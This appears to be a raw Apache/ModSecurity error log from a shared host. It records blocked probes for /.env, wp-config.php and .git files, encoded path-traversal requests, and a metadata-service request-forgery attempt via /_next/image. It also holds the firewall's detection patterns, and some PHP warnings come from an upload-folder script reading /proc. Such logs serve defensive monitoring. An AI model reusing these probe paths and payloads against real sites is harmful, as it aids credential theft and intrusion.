[Tue May 12 03:27:50.996606 2026] [security2:error] [pid 1730207:tid 1730224] [client 43.153.96.233:53088] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/naissances/"] [unique_id "agKCFjue9Sp-pIv_Bb6bsAAAAU8"]
PHP Warning:  filesize(): stat failed for /proc/25/task/25/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/25/task/25/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/25/task/25/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/25/task/25/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/25/task/25/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/25/task/25/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:28:03.136236 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.165:22742] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKCI7vMumyrWMfSu7q0rwAAAM0"]
[Tue May 12 03:28:03.136450 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.165:22742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKCI7vMumyrWMfSu7q0rwAAAM0"]
[Tue May 12 03:28:03.136542 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:22730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env~"] [unique_id "agKCI9VI9ymHBxup74-VzgAAAJE"]
[Tue May 12 03:28:03.136663 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:22730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env~"] [unique_id "agKCI9VI9ymHBxup74-VzgAAAJE"]
[Tue May 12 03:28:03.136795 2026] [security2:error] [pid 1707624:tid 1707699] [client 93.123.109.165:22754] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKCI7OxS7i6i_mT2NLS4AAAAFE"]
[Tue May 12 03:28:03.136921 2026] [security2:error] [pid 1707624:tid 1707699] [client 93.123.109.165:22754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKCI7OxS7i6i_mT2NLS4AAAAFE"]
[Tue May 12 03:28:03.136993 2026] [core:error] [pid 1730207:tid 1730217] [client 93.123.109.165:22718] AH10244: invalid URI path (/../.env)
[Tue May 12 03:28:03.145265 2026] [security2:error] [pid 1709071:tid 1709099] [client 93.123.109.165:22736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCI7vMumyrWMfSu7q0sAAAAMw"]
[Tue May 12 03:28:03.145516 2026] [security2:error] [pid 1709071:tid 1709099] [client 93.123.109.165:22736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCI7vMumyrWMfSu7q0sAAAAMw"]
[Tue May 12 03:28:03.146630 2026] [core:error] [pid 1695975:tid 1695997] [client 93.123.109.165:22690] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 03:28:03.147042 2026] [security2:error] [pid 1730207:tid 1730230] [client 93.123.109.165:22766] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.git/index"] [unique_id "agKCIzue9Sp-pIv_Bb6bvwAAAVU"]
[Tue May 12 03:28:03.147179 2026] [security2:error] [pid 1730207:tid 1730230] [client 93.123.109.165:22766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.git/index"] [unique_id "agKCIzue9Sp-pIv_Bb6bvwAAAVU"]
[Tue May 12 03:28:03.147366 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.165:22760] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/wp-config.php~"] [unique_id "agKCI1fdQaraX_prmqcqHAAAAAM"]
[Tue May 12 03:28:03.147510 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.165:22760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/wp-config.php~"] [unique_id "agKCI1fdQaraX_prmqcqHAAAAAM"]
[Tue May 12 03:28:03.147946 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.165:22856] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKCI7OxS7i6i_mT2NLS4QAAAFQ"]
[Tue May 12 03:28:03.148128 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.165:22856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKCI7OxS7i6i_mT2NLS4QAAAFQ"]
[Tue May 12 03:28:03.148401 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.165:22790] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env.backup"] [unique_id "agKCI7OxS7i6i_mT2NLS4gAAAE0"]
[Tue May 12 03:28:03.148591 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.165:22790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env.backup"] [unique_id "agKCI7OxS7i6i_mT2NLS4gAAAE0"]
[Tue May 12 03:28:03.148787 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:22812] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "maelbailly.fr"] [uri "/_next/image"] [unique_id "agKCI3o6NvB9WXx5V-6EkwAAAQ4"]
[Tue May 12 03:28:03.149512 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:22812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/_next/image"] [unique_id "agKCI3o6NvB9WXx5V-6EkwAAAQ4"]
[Tue May 12 03:28:03.154062 2026] [security2:error] [pid 1709071:tid 1709101] [client 93.123.109.165:22696] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/wp-config.php"] [unique_id "agKCI7vMumyrWMfSu7q0sQAAAM4"]
[Tue May 12 03:28:03.154287 2026] [security2:error] [pid 1709071:tid 1709101] [client 93.123.109.165:22696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/wp-config.php"] [unique_id "agKCI7vMumyrWMfSu7q0sQAAAM4"]
[Tue May 12 03:28:03.161543 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "maelbailly.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:03.169478 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:22708] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/wp-config.php.bak"] [unique_id "agKCI3o6NvB9WXx5V-6EkgAAAQA"]
[Tue May 12 03:28:03.169714 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:22708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/wp-config.php.bak"] [unique_id "agKCI3o6NvB9WXx5V-6EkgAAAQA"]
[Tue May 12 03:28:03.173396 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "maelbailly.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:03.173462 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "maelbailly.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:03.173508 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:03.184504 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:03.193455 2026] [security2:error] [pid 1695975:tid 1695998] [client 93.123.109.165:22846] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.gitignore"] [unique_id "agKCI9VI9ymHBxup74-VzwAAAJQ"]
[Tue May 12 03:28:03.193605 2026] [security2:error] [pid 1695975:tid 1695998] [client 93.123.109.165:22846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.gitignore"] [unique_id "agKCI9VI9ymHBxup74-VzwAAAJQ"]
[Tue May 12 03:28:03.340644 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:28:04.059210 2026] [security2:error] [pid 1691274:tid 1691278] [client 43.134.51.171:38076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKCJFfdQaraX_prmqcqHgAAAAE"]
[Tue May 12 03:28:04.405413 2026] [security2:error] [pid 1709071:tid 1709100] [client 93.123.109.165:22742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7vMumyrWMfSu7q0rwAAAM0"]
[Tue May 12 03:28:04.520320 2026] [security2:error] [pid 1707624:tid 1707702] [client 93.123.109.165:22856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7OxS7i6i_mT2NLS4QAAAFQ"]
[Tue May 12 03:28:04.564575 2026] [security2:error] [pid 1709071:tid 1709101] [client 93.123.109.165:22696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7vMumyrWMfSu7q0sQAAAM4"]
[Tue May 12 03:28:04.688618 2026] [security2:error] [pid 1730175:tid 1730177] [client 93.123.109.165:22708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI3o6NvB9WXx5V-6EkgAAAQA"]
